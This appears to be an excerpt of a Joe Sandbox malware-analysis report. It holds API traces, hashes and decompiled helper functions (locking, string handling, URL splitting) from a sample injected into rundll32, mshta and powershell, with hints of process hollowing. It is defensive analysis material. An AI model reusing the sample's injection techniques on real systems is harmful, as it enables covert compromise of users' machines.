                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,05572A10,00000000,00000000), ref: 05574C5C
                                                          • RtlLeaveCriticalSection.NTDLL(059BB148), ref: 05574C71
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: 4c368b5c41dd7d103456785eefe6c720630c95edc159c1ad191166c29a629923
                                                          • Instruction ID: 43c7b46a42e9138cf6735627ec6889197d7454c9c54921436ae5353bd91a7182
                                                          • Opcode Fuzzy Hash: 4c368b5c41dd7d103456785eefe6c720630c95edc159c1ad191166c29a629923
                                                          • Instruction Fuzzy Hash: C3F0DA74221200DBEF18CF94E99BF257B69BB44345B068406F8468B290CB38AC08EA15
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 37%
                                                          			E00E5152E() {
                                                          				void* _v0;
                                                          				void** _t1;
                                                          				void** _t3;
                                                          				void** _t5;
                                                          				void** _t7;
                                                          				void** _t8;
                                                          				void* _t10;

                                                          				// Same pattern as E00E54013: take the critical section at offset 0x40 (index 0x10)
                                                          				// of the global context at 0xe5a37c, wait for the busy flag at index 0x16, then
                                                          				// swap the first pointer of the context. __imp__ is RtlEnterCriticalSection /
                                                          				// RtlLeaveCriticalSection (see the APIs list below).
                                                          				_t3 =  *0xe5a37c; // 0x51b9630
                                                          				__imp__( &(_t3[0x10])); // RtlEnterCriticalSection
                                                          				while(1) {
                                                          					_t5 =  *0xe5a37c; // 0x51b9630
                                                          					_t1 =  &(_t5[0x16]); // 0x0
                                                          					if( *_t1 == 0) {
                                                          						break;
                                                          					}
                                                          					Sleep(0xa);
                                                          				}
                                                          				_t7 =  *0xe5a37c; // 0x51b9630
                                                          				_t10 =  *_t7;
                                                          				// free the old pointer unless it is the static default at 0xe5b85e
                                                          				if(_t10 != 0 && _t10 != 0xe5b85e) {
                                                          					HeapFree( *0xe5a290, 0, _t10);
                                                          					_t7 =  *0xe5a37c; // 0x51b9630
                                                          				}
                                                          				 *_t7 = _v0;
                                                          				_t8 =  &(_t7[0x10]);
                                                          				__imp__(_t8); // RtlLeaveCriticalSection
                                                          				return _t8;
                                                          			}

                                                          Statement addresses (listing side column, 0x00000000 = no address for that line): 0x00e5152e, 0x00e51537, 0x00e51547, 0x00e51547, 0x00e5154c, 0x00e51551, 0x00000000, 0x00000000, 0x00e51541, 0x00e51541, 0x00e51553, 0x00e51558, 0x00e5155c, 0x00e5156f, 0x00e51575, 0x00e51575, 0x00e5157e, 0x00e51580, 0x00e51584, 0x00e5158a

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(051B95F0), ref: 00E51537
                                                          • Sleep.KERNEL32(0000000A,?,?,00E54540,?,?,?,?,?,00E568F7,?,00000001), ref: 00E51541
                                                          • HeapFree.KERNEL32(00000000,?,?,?,00E54540,?,?,?,?,?,00E568F7,?,00000001), ref: 00E5156F
                                                          • RtlLeaveCriticalSection.NTDLL(051B95F0), ref: 00E51584
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: e2610031855781fd9cf8c32cfa7107cb3b54f91445052855f7dce2949ff91b3d
                                                          • Instruction ID: 3dfdda7bb32d79b6c4e1c1b123a5a5898c8a251196d993b687c90dd42eac83ef
                                                          • Opcode Fuzzy Hash: e2610031855781fd9cf8c32cfa7107cb3b54f91445052855f7dce2949ff91b3d
                                                          • Instruction Fuzzy Hash: 5CF0DA74200300DFE71C9F26EC4AB6937A5BB44707B085D69F902B73B1D774AD08DA12
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memcpy.NTDLL(?,?,?), ref: 05588915
                                                          • StrToIntExA.SHLWAPI(00007830,00000001,00000001), ref: 05588927
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memcpy
                                                          • String ID: 0x
                                                          • API String ID: 3510742995-3225541890
                                                          • Opcode ID: 6e1363ecf9d82aa61333dd8a3ff93f5ef0d3794dae9ce7d8fb6dd7887da40a5e
                                                          • Instruction ID: cd8a4c534761a7307d6189e93cdfc247a0f100fa17657fed837e16e61be5c7b2
                                                          • Opcode Fuzzy Hash: 6e1363ecf9d82aa61333dd8a3ff93f5ef0d3794dae9ce7d8fb6dd7887da40a5e
                                                          • Instruction Fuzzy Hash: F4017135A00119BBDB01EFA8D8059AFBBB9FB44644F404415E915E7200EB74DA09C791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memset.NTDLL ref: 05579E53
                                                          • CloseHandle.KERNEL32(?,00000000,00000100,?,00000000,?,05571A31,00000000), ref: 05579EA1
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000094,05587F46,00000000,05571A31,05577A78,00000000,05571A31,055909BE,00000000,05571A31,05577886,00000000), ref: 0557A1E5
                                                          • GetLastError.KERNEL32(?,00000000,?), ref: 0557A42C
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CloseErrorFreeHandleHeapLastmemset
                                                          • String ID:
                                                          • API String ID: 2333114656-0
                                                          • Opcode ID: 4fd60f6a1e6b86bb25de421a590853cc7650b9f058ea0caa4383bb9ecd54ba01
                                                          • Instruction ID: 6e49b4968378c1aa7909e30f6fb29224a6e36c122802c23fe111d9dafb715edf
                                                          • Opcode Fuzzy Hash: 4fd60f6a1e6b86bb25de421a590853cc7650b9f058ea0caa4383bb9ecd54ba01
                                                          • Instruction Fuzzy Hash: FE41E53120420DFBDB21AF64EC4DFAF3A6BFB89760F014412F906A6090EB75C8559BE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 055740E8: lstrlen.KERNEL32(00000000,?,?), ref: 05574141
                                                            • Part of subcall function 055740E8: lstrlen.KERNEL32(?,?,?), ref: 0557415F
                                                            • Part of subcall function 055740E8: RtlAllocateHeap.NTDLL(00000000,75146985,?), ref: 05574188
                                                            • Part of subcall function 055740E8: memcpy.NTDLL(00000000,00000000,00000000), ref: 0557419F
                                                            • Part of subcall function 055740E8: HeapFree.KERNEL32(00000000,00000000), ref: 055741B2
                                                            • Part of subcall function 055740E8: memcpy.NTDLL(00000000,?,?), ref: 055741C1
                                                          • GetLastError.KERNEL32 ref: 0557D885
                                                            • Part of subcall function 05573408: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 055734BA
                                                            • Part of subcall function 05573408: HeapFree.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?), ref: 055734DE
                                                            • Part of subcall function 05573408: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 055734EC
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0557D8A1
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0557D8B2
                                                          • SetLastError.KERNEL32(00000000), ref: 0557D8B5
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
                                                          • String ID:
                                                          • API String ID: 2451549186-0
                                                          • Opcode ID: 27bce40a8dc9df6a41aba72a53cdc1455df345d689b502f0f14e6f6b9c05d6fb
                                                          • Instruction ID: 14a2651293f8fc203b241c62a4f91745a8ab36ef07ff6ebf4dc9c0b6a4566267
                                                          • Opcode Fuzzy Hash: 27bce40a8dc9df6a41aba72a53cdc1455df345d689b502f0f14e6f6b9c05d6fb
                                                          • Instruction Fuzzy Hash: FE314932900108EFCF029F99E845C9EBFB5FF84320B054566F916A3160C7369A65EF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 055765DC: lstrlenW.KERNEL32(?), ref: 05576600
                                                            • Part of subcall function 055765DC: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05576612
                                                            • Part of subcall function 055765DC: wcstombs.NTDLL ref: 05576620
                                                            • Part of subcall function 055765DC: lstrlen.KERNEL32(00000000), ref: 05576644
                                                            • Part of subcall function 055765DC: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 05576659
                                                            • Part of subcall function 055765DC: mbstowcs.NTDLL ref: 05576666
                                                            • Part of subcall function 055765DC: HeapFree.KERNEL32(00000000,00000000), ref: 05576678
                                                            • Part of subcall function 055765DC: HeapFree.KERNEL32(00000000,00000000), ref: 05576692
                                                          • GetLastError.KERNEL32 ref: 05586C5A
                                                            • Part of subcall function 05573408: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 055734BA
                                                            • Part of subcall function 05573408: HeapFree.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?), ref: 055734DE
                                                            • Part of subcall function 05573408: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 055734EC
                                                          • HeapFree.KERNEL32(00000000,?), ref: 05586C76
                                                          • HeapFree.KERNEL32(00000000,?), ref: 05586C87
                                                          • SetLastError.KERNEL32(00000000), ref: 05586C8A
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
                                                          • String ID:
                                                          • API String ID: 3867366388-0
                                                          • Opcode ID: 4321fca381cfb6621422fa889dc00bbc46eb528ae2ca785c3b19d6a06a0c3d86
                                                          • Instruction ID: 3905df508c0552d6fb25e2cf0373b663ee696f4fa13b1506d558296f48dcb7e8
                                                          • Opcode Fuzzy Hash: 4321fca381cfb6621422fa889dc00bbc46eb528ae2ca785c3b19d6a06a0c3d86
                                                          • Instruction Fuzzy Hash: B5314A31904109FFCF12AF99DC858AEBFB5FF94320B054556F926A2160CB359A51EF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memset
                                                          • String ID:
                                                          • API String ID: 2221118986-0
                                                          • Opcode ID: ba14cb9e650df1972b00c435ff13645586936e1a86fcddbf6af39a22893596f4
                                                          • Instruction ID: 570e527ca016ef490f07b8b6baaaf8f957ecfd942bb91959b8f57963dfc3b32d
                                                          • Opcode Fuzzy Hash: ba14cb9e650df1972b00c435ff13645586936e1a86fcddbf6af39a22893596f4
                                                          • Instruction Fuzzy Hash: 7A216F7660090ABBCB219F61EC84D667BB9FF09304F540519E94A96C10D772E4B1DFD1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0558381A,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,0558D9B6), ref: 05592B61
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                            • Part of subcall function 055945A7: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,05592B8F,00000000,00000001,00000001,?,?,0558381A,00000000,00000000,00000000,00000008,0000EA60), ref: 055945B5
                                                            • Part of subcall function 055945A7: StrChrA.SHLWAPI(?,0000003F,?,?,0558381A,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,0558D9B6,?,?), ref: 055945BF
                                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0558381A,00000000,00000000,00000000,00000008,0000EA60,00000000), ref: 05592BBF
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 05592BCF
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 05592BDB
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3767559652-0
                                                          • Opcode ID: da721d7cf784b4f901870809ca90c67bd6bc229398c46783ffecaddefa5da3d8
                                                          • Instruction ID: 3fafbcc7a5bfc452fc199dd2774753a73d30911dec57289bcffb65578009be82
                                                          • Opcode Fuzzy Hash: da721d7cf784b4f901870809ca90c67bd6bc229398c46783ffecaddefa5da3d8
                                                          • Instruction Fuzzy Hash: E421D27660825AFBCF12AFB5D888EAE7FEAFF45290F054051F9059B200DB38D90497E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 58%
                                                          			E00E542AE(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                          				intOrPtr* _v8;
                                                          				void* _t17;
                                                          				intOrPtr* _t22;
                                                          				void* _t27;
                                                          				char* _t30;
                                                          				void* _t33;
                                                          				void* _t34;
                                                          				void* _t36;
                                                          				void* _t37;
                                                          				void* _t39;
                                                          				int _t42;
                                                          
                                                          				_t17 = __eax;
                                                          				_t37 = 0;
                                                          				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                          				_t2 = _t17 + 1; // 0x1
                                                          				_t28 = _t2;
                                                          				_t34 = E00E55FBC(_t2);
                                                          				if(_t34 != 0) {
                                                          					_t30 = E00E55FBC(_t28);
                                                          					if(_t30 == 0) {
                                                          						E00E513CC(_t34);
                                                          					} else {
                                                          						_t39 = _a4;
                                                          						_t22 = E00E57838(_t39);
                                                          						_v8 = _t22;
                                                          						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                          							_a4 = _t39;
                                                          						} else {
                                                          							_t26 = _t22 + 2;
                                                          							_a4 = _t22 + 2;
                                                          							_t22 = E00E57838(_t26);
                                                          							_v8 = _t22;
                                                          						}
                                                          						if(_t22 == 0) {
                                                          							__imp__(_t34, _a4);
                                                          							 *_t30 = 0x2f;
                                                          							 *((char*)(_t30 + 1)) = 0;
                                                          						} else {
                                                          							_t42 = _t22 - _a4;
                                                          							memcpy(_t34, _a4, _t42);
                                                          							 *((char*)(_t34 + _t42)) = 0;
                                                          							__imp__(_t30, _v8);
                                                          						}
                                                          						 *_a8 = _t34;
                                                          						_t37 = 1;
                                                          						 *_a12 = _t30;
                                                          					}
                                                          				}
                                                          				return _t37;
                                                          			}


                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,00E51314,00000000,00000000,00000000,051B9698,?,?,00E530D3,?,051B9698), ref: 00E542BA
                                                            • Part of subcall function 00E55FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00E52035), ref: 00E55FC8
                                                            • Part of subcall function 00E57838: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00E542E8,00000000,00000001,00000001,?,?,00E51314,00000000,00000000,00000000,051B9698), ref: 00E57846
                                                            • Part of subcall function 00E57838: StrChrA.SHLWAPI(?,0000003F,?,?,00E51314,00000000,00000000,00000000,051B9698,?,?,00E530D3,?,051B9698,0000EA60,?), ref: 00E57850
                                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00E51314,00000000,00000000,00000000,051B9698,?,?,00E530D3), ref: 00E54318
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00E54328
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00E54334
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3767559652-0
                                                          • Opcode ID: d52292bf8c9a02cc5f6d961df64370a89dccca5744ff312866577d8b04b3bc3c
                                                          • Instruction ID: df766e5572e45827e64610df5d90a6f3f5e03e644b8aa26c0c146c98f2aff584
                                                          • Opcode Fuzzy Hash: d52292bf8c9a02cc5f6d961df64370a89dccca5744ff312866577d8b04b3bc3c
                                                          • Instruction Fuzzy Hash: A521AEB2500215ABCB125F68C848ADFBFE89F0639AF045854FD09AB262D731C948D7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memset
                                                          • String ID:
                                                          • API String ID: 2221118986-0
                                                          • Opcode ID: 88bf436ddb73211ec62b6a0d81339024bc777206418987d1c0b4b13b9e441aa2
                                                          • Instruction ID: d9d1370d12b2d7e4da8b62c95efca2c0c61a8f093884985e0c5cb7b9b2fd4950
                                                          • Opcode Fuzzy Hash: 88bf436ddb73211ec62b6a0d81339024bc777206418987d1c0b4b13b9e441aa2
                                                          • Instruction Fuzzy Hash: 5B118C7260490AFBDB20AFA0DC44E76B779FF09310B040519EA46A9C10E772F9B19BE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00E51370(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                          				void* _v8;
                                                          				void* _t18;
                                                          				int _t25;
                                                          				int _t29;
                                                          				int _t34;
                                                          
                                                          				_t29 = lstrlenW(_a4);
                                                          				_t25 = lstrlenW(_a8);
                                                          				_t18 = E00E55FBC(_t25 + _t29 + _t25 + _t29 + 2);
                                                          				_v8 = _t18;
                                                          				if(_t18 != 0) {
                                                          					_t34 = _t29 + _t29;
                                                          					memcpy(_t18, _a4, _t34);
                                                          					_t10 = _t25 + 2; // 0x2
                                                          					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                          				}
                                                          				return _v8;
                                                          			}


                                                          APIs
                                                          • lstrlenW.KERNEL32(004F0053,?,75145520,00000008,051B930C,?,00E553B4,004F0053,051B930C,?,?,?,?,?,?,00E55131), ref: 00E51380
                                                          • lstrlenW.KERNEL32(00E553B4,?,00E553B4,004F0053,051B930C,?,?,?,?,?,?,00E55131), ref: 00E51387
                                                            • Part of subcall function 00E55FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00E52035), ref: 00E55FC8
                                                          • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,00E553B4,004F0053,051B930C,?,?,?,?,?,?,00E55131), ref: 00E513A7
                                                          • memcpy.NTDLL(751469A0,00E553B4,00000002,00000000,004F0053,751469A0,?,?,00E553B4,004F0053,051B930C), ref: 00E513BA
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlenmemcpy$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 2411391700-0
                                                          • Opcode ID: 141288c27905332491b4c63371989fd13e5921d268ac65fcd4827baaad63e9c1
                                                          • Instruction ID: 09c56257944f6537f41ef567cc8faa20f09571808610133ea1cad91b78c10986
                                                          • Opcode Fuzzy Hash: 141288c27905332491b4c63371989fd13e5921d268ac65fcd4827baaad63e9c1
                                                          • Instruction Fuzzy Hash: 39F03C32901118BBCF10DBA9CC85C8F7BECEF092557014466BE04E7112E731EA189BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(69B25F44,?,?,00000000,0557C4D2,00000000,?,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 05588955
                                                          • lstrlen.KERNEL32(?,?,?,00000000,0557C4D2,00000000,?,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 0558895A
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • memcpy.NTDLL(00000000,?,00000000,?,?,?,00000000,0557C4D2,00000000,?,?,00000000,69B25F44,?,?,?), ref: 05588976
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 05588994
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$AllocateHeaplstrcpymemcpy
                                                          • String ID:
                                                          • API String ID: 1697500751-0
                                                          • Opcode ID: ccf5590956582921efdca14e2c379c4c931e38c865701cb721762521b212d3e9
                                                          • Instruction ID: b4f227b91340bbfdb7e55867ba4a137ee72482c59e4ffca33e3fd3184b0953d0
                                                          • Opcode Fuzzy Hash: ccf5590956582921efdca14e2c379c4c931e38c865701cb721762521b212d3e9
                                                          • Instruction Fuzzy Hash: 52F0C276508742FBD32166AA9C48E77BF98FFC5310B490516E55593100E735D4188BB2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(059B9986,00000000,751881D0,00000000,05581B94,00000000), ref: 055759A5
                                                          • lstrlen.KERNEL32(?), ref: 055759AD
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • lstrcpy.KERNEL32(00000000,059B9986), ref: 055759C1
                                                          • lstrcat.KERNEL32(00000000,?), ref: 055759CC
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                          • String ID:
                                                          • API String ID: 74227042-0
                                                          • Opcode ID: 54d48e214c6af850441d4da6cf1f6a7f6beec1ca0687b50507f308c149ece15f
                                                          • Instruction ID: edb969e7f12800e5c399b166e5f79260d9780ff01188668bb77f9080bd0ba18a
                                                          • Opcode Fuzzy Hash: 54d48e214c6af850441d4da6cf1f6a7f6beec1ca0687b50507f308c149ece15f
                                                          • Instruction Fuzzy Hash: D7E09233615225A787115BE9AC88CAFFFACFFC96503050417F600D3100CB2998189BE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(051B887A,00000000,00000000,00000000,00E54AC6,00000000), ref: 00E55C9D
                                                          • lstrlen.KERNEL32(?), ref: 00E55CA5
                                                            • Part of subcall function 00E55FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00E52035), ref: 00E55FC8
                                                          • lstrcpy.KERNEL32(00000000,051B887A), ref: 00E55CB9
                                                          • lstrcat.KERNEL32(00000000,?), ref: 00E55CC4
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                          • String ID:
                                                          • API String ID: 74227042-0
                                                          • Opcode ID: 133ebc38b20ef07a610d1683f3f21f6460631e1d526964678ac3a3d0f23121f0
                                                          • Instruction ID: 5cdaf4ee6caf24bff9d75c3d0f626b082a7f26af694ce3a150ed134d7ad439e6
                                                          • Opcode Fuzzy Hash: 133ebc38b20ef07a610d1683f3f21f6460631e1d526964678ac3a3d0f23121f0
                                                          • Instruction Fuzzy Hash: F2E01273501721AB87115BE59C48C9FFBADFF997573080C5AFA01E3211C7249809DBE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Executed Functions

                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000003.635936697.0000015293BA0000.00000010.00000001.sdmp, Offset: 0000015293BA0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_3_15293ba0000_mshta.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction ID: 0e7f58dc76aaff395a004bda258dc4fc36231e99e24942ad0ca517c9f7c1859b
                                                          • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction Fuzzy Hash: 5D900215495C5695D41411910C5529C508063D9259FD45480C41AE4244D45E02961152
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Executed Functions

                                                          Control-flow Graph

                                                          Control-flow graph of the function at 2174f3ee95c (rendered as a node/edge list in the original; omitted here). API calls on the graph: NtUnmapViewOfSection, NtSetContextThread. Internal calls: 2174f3ddf20, 2174f3e5b80, 2174f3e8b90, 2174f3e6e1c, 2174f3fdb0a, 2174f3e10cc, 2174f3f4ba0, 2174f3f99d0, 2174f3dfca8, 2174f3e1950.
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
                                                          • Opcode ID: 9e26852af833edec412c0de11438924e430ff278851e67a344344114f521d1d2
                                                          • Instruction ID: eea262634f3670937933a653d36d7d38b38be6a3b683d3daad04cbcb68dc3413
                                                          • Opcode Fuzzy Hash: 9e26852af833edec412c0de11438924e430ff278851e67a344344114f521d1d2
                                                          • Instruction Fuzzy Hash: BF223030618A098FEB99EF5CD8897E673F1FBA8301F41452DE44AC3295DF34E9858B85
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, Offset: 000002174F3D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_31_2_2174f3d0000_powershell.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationQueryToken
                                                          • String ID: 0
                                                          • API String ID: 4239771691-4108050209
                                                          • Opcode ID: b00bdbe5e76e8574fbf38c79017efbcac25b001069e063d358994e26018d4f43
                                                          • Instruction ID: fc0ae499c62046124230c3a728b69364000ffbbe0ba114ff46b799e4d74dec45
                                                          • Opcode Fuzzy Hash: b00bdbe5e76e8574fbf38c79017efbcac25b001069e063d358994e26018d4f43
